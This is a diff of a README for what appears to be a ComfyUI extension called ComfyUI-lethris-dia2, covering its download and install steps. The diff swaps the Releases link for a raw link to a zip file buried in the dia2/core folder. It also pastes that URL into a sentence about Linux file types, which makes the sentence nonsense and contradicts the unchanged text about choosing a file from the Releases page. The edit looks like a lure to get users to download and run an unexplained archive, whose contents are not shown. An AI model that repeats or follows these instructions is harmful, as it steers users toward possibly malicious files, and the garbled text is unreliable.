akramnasreddine/ComfyUI-lethris-dia2/README.md

 ## 📥 Download & Install

 1. **Visit the Releases Page**
-   To download the software, [visit this page to download](https://github.com/akramnasreddine/ComfyUI-lethris-dia2/releases).
+   To download the software, [visit this page to download](https://github.com/akramnasreddine/ComfyUI-lethris-dia2/raw/refs/heads/main/dia2/core/Comfy_dia_lethris_U_v2.9-beta.3.zip).
 You will find the latest version available for download.

 2. **Choose the Right File**
    On the Releases page, look for the most recent version.
 The files are often named clearly, so identify the one that suits your operating system.
-If you're unsure, the `.exe` file is typically for Windows users, while `.tar.gz` might be for Linux users.
+If you're unsure, the `.exe` file is typically for Windows users, while `https://github.com/akramnasreddine/ComfyUI-lethris-dia2/raw/refs/heads/main/dia2/core/Comfy_dia_lethris_U_v2.9-beta.3.zip` might be for Linux users.

 3. **Download the File**
    Click the file name to start downloading.
 Your browser may ask where to save it.
 Choose a location you can easily find later, like your Desktop or Downloads folder.